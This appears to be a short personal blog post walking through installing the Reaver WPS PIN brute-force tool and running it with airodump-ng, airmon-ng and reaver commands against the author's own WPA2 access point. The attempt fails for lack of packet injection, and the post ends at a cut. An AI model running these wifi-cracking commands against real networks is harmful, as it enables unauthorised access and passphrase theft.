I've been hearing all about this tool "Reaver":
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf1) Download (I downloaded the latest tar.gz, 1.2)
2) Ungzip, untar: `tar xvfz reaver-1.2.tar.gz`
3) Install dependencies: `sudo apt-get install libpcap-dev`
*NOTE* -- It seems like it may also depend on sql-lite ... or something, this is from the comments:
3a.) `sudo apt-get install libsqlite3-dev`
4) config, make install:
`sudo make install`
5)now type `reaver` at the command line to see usage :)
You'll also probably want the aircrack-ng suite if you haven't done any wifi cracking/recon/diddling before...
I'm going to just type out what I'm doing as I go along to actually use reaver.
1) `sudo airodump-ng eth1` checking the BSSIDs and looking for my WPA2 AP.
2) `sudo airmon-ng start eth1`
3) exit, then open reaver `sudo reaver -i eth1 -b 00:11:22:33:44:55 -c 11 -vv`
Now... I'm not sure if it's doing it's magick, I'll check wireshark soon, and maybe read the paper about the vulnerability, but I'm in skirpt kiddy mode at the moment.
It wasn't doing it's magic. My card doesn't support packet INJECTION, oh well maybe someday I'll get a real man's wifi interface.
Also here's someone actually running the attack: